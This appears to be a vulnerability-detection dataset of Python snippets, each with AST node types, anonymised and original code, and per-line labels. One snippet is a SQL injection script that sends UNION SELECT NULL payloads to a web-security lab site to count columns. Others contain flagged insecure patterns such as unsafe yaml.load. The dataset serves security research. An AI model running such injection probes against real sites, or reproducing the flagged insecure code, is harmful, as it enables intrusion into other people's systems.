[ "FunctionDef'", "Docstring", "Assign'", "Assign'", "Assign'", "Assign'", "Expr'", "Expr'", "Return'" ]
[ "def __init__(self, VAR_0):...\n", "super().__init__()\n", "self.state = CLIState()\n", "self.conf = VAR_0\n" ]
[ "def __init__(self, conf):...\n", "super().__init__()\n", "self.state = CLIState()\n", "self.conf = conf\n" ]
[ 0, 0, 0, 0 ]
[ "FunctionDef'", "Expr'", "Assign'", "Assign'" ]
[ "def FUNC_17(VAR_16):...\n", "return VAR_19(VAR_16, 'touch')\n" ]
[ "def touch(value):...\n", "return flag(value, 'touch')\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Return'" ]
[ "def FUNC_0(self, **VAR_1):...\n", "VAR_3 = super().get_context_data(**kwargs)\n", "VAR_3['search_form'] = SearchForm()\n", "VAR_4 = self.kwargs['pk']\n", "VAR_3['geoip'] = GeoIP().lookup(VAR_4)\n", "VAR_3['domain'] = socket.gethostbyaddr(VAR_4)[0]\n", "VAR_5 = VT()\n", "VAR_3['vt_ip'] = VAR_5.getIPReport(VAR_4)\n", "VAR_6 = ThreatMiner()\n", "VAR_3['tm_url'] = VAR_6.getURIFromIP(VAR_4)\n", "VAR_3['tm_sample'] = VAR_6.getSamplesFromIP(VAR_4)\n", "VAR_3['tm_report'] = VAR_6.getReportFromIP(VAR_4)\n", "VAR_3['bls'] = blacklist.objects.filter(Q(VAR_4=ip) | Q(url__contains=ip))\n", "VAR_7 = VAR_3['bls'].count()\n", "if VAR_7 > 0:\n", "VAR_3['bls_count'] = VAR_7\n", "VAR_3['events'] = Event.objects.filter(Q(info__icontains=ip)).order_by(\n '-publish_timestamp')\n", "VAR_7 = VAR_3['events'].count()\n", "if VAR_7 > 0:\n", "VAR_3['events_count'] = VAR_7\n", "VAR_3['attributes'] = Attribute.objects.filter(Q(value__icontains=ip)\n ).order_by('-timestamp')\n", "VAR_7 = VAR_3['attributes'].count()\n", "if VAR_7 > 0:\n", "VAR_3['attributes_count'] = VAR_7\n", "VAR_3['tws'] = tweet.objects.filter(Q(text__icontains=ip)).order_by('-datetime'\n )\n", "VAR_7 = VAR_3['tws'].count()\n", "if VAR_7 > 0:\n", "VAR_3['tws_count'] = VAR_7\n", "VAR_3['exs'] = Exploit.objects.filter(Q(text__icontains=ip)).order_by(\n '-datetime')\n", "VAR_7 = VAR_3['exs'].count()\n", "if VAR_7 > 0:\n", "VAR_3['exs_count'] = VAR_7\n", "return VAR_3\n" ]
[ "def get_context_data(self, **kwargs):...\n", "context = super().get_context_data(**kwargs)\n", "context['search_form'] = SearchForm()\n", "ip = self.kwargs['pk']\n", "context['geoip'] = GeoIP().lookup(ip)\n", "context['domain'] = socket.gethostbyaddr(ip)[0]\n", "vt = VT()\n", "context['vt_ip'] = vt.getIPReport(ip)\n", "tm = ThreatMiner()\n", "context['tm_url'] = tm.getURIFromIP(ip)\n", "context['tm_sample'] = tm.getSamplesFromIP(ip)\n", "context['tm_report'] = tm.getReportFromIP(ip)\n", "context['bls'] = blacklist.objects.filter(Q(ip=ip) | Q(url__contains=ip))\n", "count = context['bls'].count()\n", "if count > 0:\n", "context['bls_count'] = count\n", "context['events'] = Event.objects.filter(Q(info__icontains=ip)).order_by(\n '-publish_timestamp')\n", "count = context['events'].count()\n", "if count > 0:\n", "context['events_count'] = count\n", "context['attributes'] = Attribute.objects.filter(Q(value__icontains=ip)\n ).order_by('-timestamp')\n", "count = context['attributes'].count()\n", "if count > 0:\n", "context['attributes_count'] = count\n", "context['tws'] = tweet.objects.filter(Q(text__icontains=ip)).order_by(\n '-datetime')\n", "count = context['tws'].count()\n", "if count > 0:\n", "context['tws_count'] = count\n", "context['exs'] = Exploit.objects.filter(Q(text__icontains=ip)).order_by(\n '-datetime')\n", "count = context['exs'].count()\n", "if count > 0:\n", "context['exs_count'] = count\n", "return context\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Condition", "Assign'", "Assign'", "Assign'", "Condition", "Assign'", "Assign'", "Assign'", "Condition", "Assign'", "Assign'", "Assign'", "Condition", "Assign'", "Assign'", "Assign'", "Condition", "Assign'", "Return'" ]
[ "def FUNC_21(VAR_21):...\n", "\"\"\"docstring\"\"\"\n", "return json.load(VAR_0)\n", "VAR_0.seek(0)\n", "import yaml\n", "return yaml.load(VAR_0)\n" ]
[ "def _load_configfile(configpath):...\n", "\"\"\"docstring\"\"\"\n", "return json.load(f)\n", "f.seek(0)\n", "import yaml\n", "return yaml.load(f)\n" ]
[ 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "Return'", "Expr'", "Import'", "Return'" ]
[ "@property...\n", "" ]
[ "@property...\n", "" ]
[ 0, 0 ]
[ "Condition", "Condition" ]
[ "def __init__(self, VAR_3):...\n", "\"\"\"docstring\"\"\"\n", "self.hostname = VAR_3\n", "self.message = 'Lost connection to remote host %s' % VAR_3\n" ]
[ "def __init__(self, hostname):...\n", "\"\"\"docstring\"\"\"\n", "self.hostname = hostname\n", "self.message = 'Lost connection to remote host %s' % hostname\n" ]
[ 0, 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "Assign'", "Assign'" ]
[ "@app.route('/manage/articles/update', methods=['POST'])...\n", "if current_user.is_authenticated:\n", "VAR_13 = request.form.get('newbody')\n", "return redirect('/index')\n", "VAR_14 = request.form.get('oldbody')\n", "VAR_15 = request.form.get('newurl')\n", "VAR_16 = request.form.get('newimageurl')\n", "VAR_10 = Article.query.filter_by(VAR_9=oldbody).first()\n", "VAR_10.body = VAR_13\n", "VAR_10.url = VAR_15\n", "VAR_10.imageurl = VAR_16\n", "db.session.commit()\n", "return redirect('/manage/articles')\n" ]
[ "@app.route('/manage/articles/update', methods=['POST'])...\n", "if current_user.is_authenticated:\n", "newbody = request.form.get('newbody')\n", "return redirect('/index')\n", "oldbody = request.form.get('oldbody')\n", "newurl = request.form.get('newurl')\n", "newimageurl = request.form.get('newimageurl')\n", "article = Article.query.filter_by(body=oldbody).first()\n", "article.body = newbody\n", "article.url = newurl\n", "article.imageurl = newimageurl\n", "db.session.commit()\n", "return redirect('/manage/articles')\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "Condition", "Condition", "Assign'", "Return'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Expr'", "Return'" ]
[ "import requests\n", "import sys\n", "VAR_0 = 'https://abcd.web-security-academy.net/page'\n", "VAR_1 = {'category': 'Lifestyle'}\n", "VAR_2 = [\"'UNION\", 'SELECT', 'NULL', '--']\n", "VAR_3 = {'category': f\"Lifestyle{' '.join(VAR_2)}\"}\n", "VAR_4 = requests.Session()\n", "VAR_5 = VAR_4.get(VAR_0, VAR_1=sqli)\n", "if VAR_5.status_code == 404:\n", "sys.exit('The session you are looking for has expired')\n", "while not VAR_5.ok:\n", "VAR_2.pop(-1)\n", "print(f\"There are {VAR_2.count('NULL') + VAR_2.count(',NULL')} columns:\")\n", "VAR_2.extend([',NULL', '--'])\n", "print(VAR_5.url)\n", "VAR_3['category'] = f\"Lifestyle{' '.join(VAR_2)}\"\n", "VAR_5 = VAR_4.get(VAR_0, VAR_1=sqli)\n" ]
[ "import requests\n", "import sys\n", "url = 'https://abcd.web-security-academy.net/page'\n", "params = {'category': 'Lifestyle'}\n", "null = [\"'UNION\", 'SELECT', 'NULL', '--']\n", "sqli = {'category': f\"Lifestyle{' '.join(null)}\"}\n", "api_session = requests.Session()\n", "response = api_session.get(url, params=sqli)\n", "if response.status_code == 404:\n", "sys.exit('The session you are looking for has expired')\n", "while not response.ok:\n", "null.pop(-1)\n", "print(f\"There are {null.count('NULL') + null.count(',NULL')} columns:\")\n", "null.extend([',NULL', '--'])\n", "print(response.url)\n", "sqli['category'] = f\"Lifestyle{' '.join(null)}\"\n", "response = api_session.get(url, params=sqli)\n" ]
[ 0, 0, 4, 0, 4, 0, 0, 4, 0, 0, 4, 4, 4, 4, 4, 0, 0 ]
[ "Import'", "Import'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Condition", "Expr'", "Condition", "Expr'", "Expr'", "Expr'", "Expr'", "Assign'", "Assign'" ]
[ "@utils.synchronized('3par', external=True)...\n", "\"\"\"docstring\"\"\"\n", "self.common.client_login()\n", "VAR_20 = self._create_host(VAR_6, VAR_9)\n", "VAR_21 = self.common.create_vlun(VAR_6, VAR_20)\n", "VAR_22 = self.common.get_ports()\n", "self.common.client_logout()\n", "VAR_23 = {'driver_volume_type': 'fibre_channel', 'data': {'target_lun':\n VAR_21['lun'], 'target_discovered': True, 'target_wwn': VAR_22['FC']}}\n", "return VAR_23\n" ]
[ "@utils.synchronized('3par', external=True)...\n", "\"\"\"docstring\"\"\"\n", "self.common.client_login()\n", "host = self._create_host(volume, connector)\n", "vlun = self.common.create_vlun(volume, host)\n", "ports = self.common.get_ports()\n", "self.common.client_logout()\n", "info = {'driver_volume_type': 'fibre_channel', 'data': {'target_lun': vlun[\n 'lun'], 'target_discovered': True, 'target_wwn': ports['FC']}}\n", "return info\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "Condition", "Docstring", "Expr'", "Assign'", "Assign'", "Assign'", "Expr'", "Assign'", "Return'" ]
[ "def FUNC_0(VAR_0, VAR_1=None, VAR_2=False):...\n", "VAR_3 = None\n", "if conf.eString and conf.eString in VAR_0:\n", "VAR_4 = VAR_0.index(conf.eString)\n", "if conf.eRegexp:\n", "VAR_5 = len(conf.eString)\n", "VAR_3 = re.findall(conf.eRegexp, VAR_0, re.I | re.M)\n", "if conf.string:\n", "VAR_6 = VAR_0[:VAR_4]\n", "if VAR_3:\n", "if conf.string in VAR_0:\n", "if conf.regexp:\n", "VAR_6 += VAR_0[VAR_4 + VAR_5:]\n", "for regExpResult in VAR_3:\n", "return True\n", "return False\n", "if re.search(conf.regexp, VAR_0, re.I | re.M):\n", "conf.seqMatcher.set_seq2(VAR_0)\n", "VAR_0 = VAR_6\n", "VAR_4 = VAR_0.index(regExpResult)\n", "return True\n", "return False\n", "if VAR_2:\n", "VAR_5 = len(regExpResult)\n", "return round(conf.seqMatcher.ratio(), 5)\n", "if round(conf.seqMatcher.ratio(), 5) >= MATCH_RATIO:\n", "VAR_7 = VAR_0[:VAR_4]\n", "return True\n", "return False\n", "VAR_7 += VAR_0[VAR_4 + VAR_5:]\n", "VAR_0 = VAR_7\n" ]
[ "def comparison(page, headers=None, getSeqMatcher=False):...\n", "regExpResults = None\n", "if conf.eString and conf.eString in page:\n", "index = page.index(conf.eString)\n", "if conf.eRegexp:\n", "length = len(conf.eString)\n", "regExpResults = re.findall(conf.eRegexp, page, re.I | re.M)\n", "if conf.string:\n", "pageWithoutString = page[:index]\n", "if regExpResults:\n", "if conf.string in page:\n", "if conf.regexp:\n", "pageWithoutString += page[index + length:]\n", "for regExpResult in regExpResults:\n", "return True\n", "return False\n", "if re.search(conf.regexp, page, re.I | re.M):\n", "conf.seqMatcher.set_seq2(page)\n", "page = pageWithoutString\n", "index = page.index(regExpResult)\n", "return True\n", "return False\n", "if getSeqMatcher:\n", "length = len(regExpResult)\n", "return round(conf.seqMatcher.ratio(), 5)\n", "if round(conf.seqMatcher.ratio(), 5) >= MATCH_RATIO:\n", "pageWithoutRegExp = page[:index]\n", "return True\n", "return False\n", "pageWithoutRegExp += page[index + length:]\n", "page = pageWithoutRegExp\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 2, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Condition", "Assign'", "Condition", "Assign'", "Assign'", "Condition", "Assign'", "Condition", "Condition", "Condition", "AugAssign'", "For", "Return'", "Return'", "Condition", "Expr'", "Assign'", "Assign'", "Return'", "Return'", "Condition", "Assign'", "Return'", "Condition", "Assign'", "Return'", "Return'", "AugAssign'", "Assign'" ]
[ "def FUNC_14(VAR_6, VAR_11=False):...\n", "VAR_15 = [VAR_4._create_compiler_jardep(VAR_6)]\n", "if VAR_11:\n", "VAR_20 = JarDependency(org='org.scala-lang', VAR_5='jline', rev=\n scala_build_info[version].full_version)\n", "VAR_4.register_jvm_tool(VAR_8, VAR_4._key_for_tool_version('scala-repl',\n VAR_6), VAR_15=classpath)\n", "VAR_15.append(VAR_20)\n" ]
[ "def register_scala_repl_tool(version, with_jline=False):...\n", "classpath = [cls._create_compiler_jardep(version)]\n", "if with_jline:\n", "jline_dep = JarDependency(org='org.scala-lang', name='jline', rev=\n scala_build_info[version].full_version)\n", "cls.register_jvm_tool(register, cls._key_for_tool_version('scala-repl',\n version), classpath=classpath)\n", "classpath.append(jline_dep)\n" ]
[ 0, 0, 0, 0, 7, 0 ]
[ "FunctionDef'", "Assign'", "Condition", "Assign'", "Expr'", "Expr'" ]
[ "@inlineCallbacks...\n", "yield self.close_connections()\n", "yield deferLater(reactor, 0.3, lambda : None)\n", "yield super(CLASS_1, self).tearDown()\n" ]
[ "@inlineCallbacks...\n", "yield self.close_connections()\n", "yield deferLater(reactor, 0.3, lambda : None)\n", "yield super(TestEventsEndpoint, self).tearDown()\n" ]
[ 0, 0, 0, 0 ]
[ "Condition", "Expr'", "Expr'", "Expr'" ]
[ "def FUNC_19(VAR_14):...\n", "" ]
[ "def create_basename_core(basename):...\n", "" ]
[ 0, 0 ]
[ "FunctionDef'", "Condition" ]
[ "def FUNC_48(self):...\n", "self.compilation_ko(\n \"\"\"\nif header :contains :comparator \"i;prout\" \"Subject\" \"MAKE MONEY FAST\" {\n discard;\n}\n\"\"\"\n )\n" ]
[ "def test_bad_comparator_value(self):...\n", "self.compilation_ko(\n \"\"\"\nif header :contains :comparator \"i;prout\" \"Subject\" \"MAKE MONEY FAST\" {\n discard;\n}\n\"\"\"\n )\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Expr'" ]
[ "def FUNC_1(VAR_0, VAR_1, VAR_2):...\n", "VAR_3 = VAR_0.get_input('project', default='')\n", "VAR_4 = VAR_0.get_input('username', default='')\n", "VAR_1['GCE_EMAIL'] = VAR_4\n", "VAR_1['GCE_PROJECT'] = VAR_3\n", "VAR_5 = {'type': 'service_account', 'private_key': VAR_0.get_input(\n 'ssh_key_data', default=''), 'client_email': VAR_4, 'project_id': VAR_3}\n", "VAR_6, VAR_7 = tempfile.mkstemp(dir=private_data_dir)\n", "VAR_8 = os.fdopen(VAR_6, 'w')\n", "json.dump(VAR_5, VAR_8)\n", "VAR_8.close()\n", "os.chmod(VAR_7, stat.S_IRUSR | stat.S_IWUSR)\n", "VAR_1['GCE_CREDENTIALS_FILE_PATH'] = VAR_7\n" ]
[ "def gce(cred, env, private_data_dir):...\n", "project = cred.get_input('project', default='')\n", "username = cred.get_input('username', default='')\n", "env['GCE_EMAIL'] = username\n", "env['GCE_PROJECT'] = project\n", "json_cred = {'type': 'service_account', 'private_key': cred.get_input(\n 'ssh_key_data', default=''), 'client_email': username, 'project_id':\n project}\n", "handle, path = tempfile.mkstemp(dir=private_data_dir)\n", "f = os.fdopen(handle, 'w')\n", "json.dump(json_cred, f)\n", "f.close()\n", "os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)\n", "env['GCE_CREDENTIALS_FILE_PATH'] = path\n" ]
[ 0, 0, 0, 0, 0, 2, 2, 2, 2, 2, 0, 0 ]
[ "FunctionDef'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Expr'", "Expr'", "Expr'", "Assign'" ]
[ "\"\"\"string\"\"\"\n", "VAR_0 = ''\n", "VAR_1 = ''\n", "VAR_2 = ''\n", "VAR_3 = VAR_2 + 'Database.db'\n", "VAR_4 = VAR_2 + 'beatmaps/temp'\n", "VAR_5 = VAR_2 + 'beatmaps/permanent'\n", "VAR_6 = VAR_2 + 'Managment'\n", "VAR_7 = VAR_2 + 'logs.txt'\n", "VAR_8 = VAR_2 + 'helpFiles/helpMASTER.txt'\n", "VAR_9 = VAR_2 + 'helpFiles/helpADMIN.txt'\n", "VAR_10 = VAR_2 + 'helpFiles/helpUSER.txt'\n", "VAR_11 = 'o!'\n", "VAR_12 = '310348632094146570'\n", "VAR_13 = '310348632094146570'\n", "VAR_14 = '315166181256593418'\n", "VAR_15 = '213262036069515264'\n", "VAR_16 = 'en'\n" ]
[ "\"\"\"\nThis is a setting file created by Renondedju\n\nEvry Api parameters written in this file are private and secret ! \n\"\"\"\n", "osuApiKey = ''\n", "discordToken = ''\n", "workingDirrectory = ''\n", "beatmapDatabase = workingDirrectory + 'Database.db'\n", "beatmapsDownloadsTemp = workingDirrectory + 'beatmaps/temp'\n", "beatmapsDownloadsPermanent = workingDirrectory + 'beatmaps/permanent'\n", "managmentFiles = workingDirrectory + 'Managment'\n", "logsFile = workingDirrectory + 'logs.txt'\n", "helpMasterFile = workingDirrectory + 'helpFiles/helpMASTER.txt'\n", "helpAdminFile = workingDirrectory + 'helpFiles/helpADMIN.txt'\n", "helpUserFile = workingDirrectory + 'helpFiles/helpUSER.txt'\n", "commandPrefix = 'o!'\n", "mainServerID = '310348632094146570'\n", "mainChannelId = '310348632094146570'\n", "logsChannelId = '315166181256593418'\n", "ownerDiscordId = '213262036069515264'\n", "mainLang = 'en'\n" ]
[ 2, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "Expr'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'" ]
[ "def __hash__(self):...\n", "return self._file.__hash__()\n" ]
[ "def __hash__(self):...\n", "return self._file.__hash__()\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Return'" ]
[ "def __init__(self, VAR_1=None, VAR_2=None, VAR_3=None, VAR_4=None, VAR_5=...\n", "\"\"\"docstring\"\"\"\n", "self._rules = OrderedDict()\n", "self.first_rule = None\n", "self._workdir = None\n", "self.overwrite_workdir = VAR_6\n", "self.workdir_init = os.path.abspath(os.curdir)\n", "self._ruleorder = Ruleorder()\n", "self._localrules = set()\n", "self.linemaps = dict()\n", "self.rule_count = 0\n", "self.basedir = os.path.dirname(VAR_1)\n", "self.snakefile = os.path.abspath(VAR_1)\n", "self.snakemakepath = VAR_2\n", "self.included = []\n", "self.included_stack = []\n", "self.jobscript = VAR_3\n", "self.persistence = None\n", "self.global_resources = None\n", "self.globals = globals()\n", "self._subworkflows = dict()\n", "self.overwrite_shellcmd = VAR_4\n", "self.overwrite_config = VAR_5\n", "self.overwrite_configfile = VAR_7\n", "self.config_args = VAR_8\n", "self._onsuccess = lambda log: None\n", "self._onerror = lambda log: None\n", "self.debug = VAR_9\n", "VAR_85 = dict()\n", "VAR_85.update(self.overwrite_config)\n", "VAR_86 = CLASS_3()\n" ]
[ "def __init__(self, snakefile=None, snakemakepath=None, jobscript=None,...\n", "\"\"\"docstring\"\"\"\n", "self._rules = OrderedDict()\n", "self.first_rule = None\n", "self._workdir = None\n", "self.overwrite_workdir = overwrite_workdir\n", "self.workdir_init = os.path.abspath(os.curdir)\n", "self._ruleorder = Ruleorder()\n", "self._localrules = set()\n", "self.linemaps = dict()\n", "self.rule_count = 0\n", "self.basedir = os.path.dirname(snakefile)\n", "self.snakefile = os.path.abspath(snakefile)\n", "self.snakemakepath = snakemakepath\n", "self.included = []\n", "self.included_stack = []\n", "self.jobscript = jobscript\n", "self.persistence = None\n", "self.global_resources = None\n", "self.globals = globals()\n", "self._subworkflows = dict()\n", "self.overwrite_shellcmd = overwrite_shellcmd\n", "self.overwrite_config = overwrite_config\n", "self.overwrite_configfile = overwrite_configfile\n", "self.config_args = config_args\n", "self._onsuccess = lambda log: None\n", "self._onerror = lambda log: None\n", "self.debug = debug\n", "config = dict()\n", "config.update(self.overwrite_config)\n", "rules = Rules()\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "Condition", "Docstring", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Expr'", "Assign'" ]
[ "@gen.coroutine...\n", "VAR_16 = {}\n", "VAR_23 = self.get_argument('author', 'Anonymous')\n", "VAR_24 = self.get_argument('title')\n", "VAR_1 = FUNC_1(self.get_argument('image'))\n", "VAR_25 = self.get_argument('post-text')\n", "VAR_0 = FUNC_2(VAR_25)\n", "if not VAR_24:\n", "VAR_27 = u'?error=' + escape.url_escape('Title must be filled.')\n", "if not VAR_25:\n", "self.redirect('/new' + VAR_27)\n", "VAR_27 = u'?error=' + escape.url_escape('Post cannot be empty.')\n", "if VAR_0 is None:\n", "self.redirect('/new' + VAR_27)\n", "VAR_27 = u'?error=' + escape.url_escape(\n 'Forbidden or invalid url detected in post body.')\n", "VAR_28 = FUNC_0(VAR_0)\n", "self.redirect('/new' + VAR_27)\n", "VAR_6 = slugify.slugify(VAR_28[:30])\n", "VAR_16['author'] = VAR_23\n", "VAR_16['date'] = datetime.datetime.now().replace(microsecond=0)\n", "VAR_16['image'] = VAR_1\n", "VAR_16['summary'] = VAR_28\n", "VAR_16['title'] = VAR_24\n", "VAR_16['text'] = VAR_0\n", "VAR_16['slug'] = VAR_6\n", "yield self.collection.insert_one(VAR_16)\n", "self.redirect('/post/' + VAR_6)\n" ]
[ "@gen.coroutine...\n", "entry = {}\n", "author = self.get_argument('author', 'Anonymous')\n", "title = self.get_argument('title')\n", "image = validate_image(self.get_argument('image'))\n", "html = self.get_argument('post-text')\n", "text = validate_html(html)\n", "if not title:\n", "error = u'?error=' + escape.url_escape('Title must be filled.')\n", "if not html:\n", "self.redirect('/new' + error)\n", "error = u'?error=' + escape.url_escape('Post cannot be empty.')\n", "if text is None:\n", "self.redirect('/new' + error)\n", "error = u'?error=' + escape.url_escape(\n 'Forbidden or invalid url detected in post body.')\n", "summary = generate_summary(text)\n", "self.redirect('/new' + error)\n", "slug = slugify.slugify(summary[:30])\n", "entry['author'] = author\n", "entry['date'] = datetime.datetime.now().replace(microsecond=0)\n", "entry['image'] = image\n", "entry['summary'] = summary\n", "entry['title'] = title\n", "entry['text'] = text\n", "entry['slug'] = slug\n", "yield self.collection.insert_one(entry)\n", "self.redirect('/post/' + slug)\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0 ]
[ "Condition", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Condition", "Assign'", "Condition", "Expr'", "Assign'", "Condition", "Expr'", "Assign'", "Assign'", "Expr'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Expr'", "Expr'" ]
[ "@staticmethod...\n", "if VAR_17[-3:] in ('.gz', '.br'):\n", "VAR_32 = VAR_17[:-3]\n", "return False\n", "if VAR_18 is None:\n", "return os.path.isfile(VAR_32)\n", "return VAR_32 in VAR_18\n" ]
[ "@staticmethod...\n", "if path[-3:] in ('.gz', '.br'):\n", "uncompressed_path = path[:-3]\n", "return False\n", "if stat_cache is None:\n", "return os.path.isfile(uncompressed_path)\n", "return uncompressed_path in stat_cache\n" ]
[ 0, 0, 0, 0, 0, 0, 0 ]
[ "Condition", "Condition", "Assign'", "Return'", "Condition", "Return'", "Return'" ]
[ "def FUNC_6(self, VAR_8):...\n", "\"\"\"docstring\"\"\"\n", "if VAR_8 in self.requests:\n", "self.requests[VAR_8].finish()\n", "if VAR_8 in self.databuffer:\n" ]
[ "def client_disconnect(self, csessid):...\n", "\"\"\"docstring\"\"\"\n", "if csessid in self.requests:\n", "self.requests[csessid].finish()\n", "if csessid in self.databuffer:\n" ]
[ 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "Condition", "Expr'", "Condition" ]
[ "def FUNC_7(VAR_7):...\n", "\"\"\"docstring\"\"\"\n", "@wraps(VAR_7)...\n", "return VAR_7(*VAR_8, **kwargs)\n", "current_app.logger.warning(e.message, exc_info=True)\n", "return FUNC_16\n", "return FUNC_15(e.remote, e.response, e.code, e.uri, e.description)\n" ]
[ "def oauth_error_handler(f):...\n", "\"\"\"docstring\"\"\"\n", "@wraps(f)...\n", "return f(*args, **kwargs)\n", "current_app.logger.warning(e.message, exc_info=True)\n", "return inner\n", "return oauth2_handle_error(e.remote, e.response, e.code, e.uri, e.description)\n" ]
[ 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "Condition", "Return'", "Expr'", "Return'", "Return'" ]
[ "@property...\n", "return self._output\n" ]
[ "@property...\n", "return self._output\n" ]
[ 0, 0 ]
[ "Condition", "Return'" ]
[ "def FUNC_0(self, VAR_0, VAR_1, VAR_2):...\n", "self.req_handlers[VAR_0, VAR_1] = VAR_2\n" ]
[ "def set_req_handler(self, interface, method, fun):...\n", "self.req_handlers[interface, method] = fun\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Assign'" ]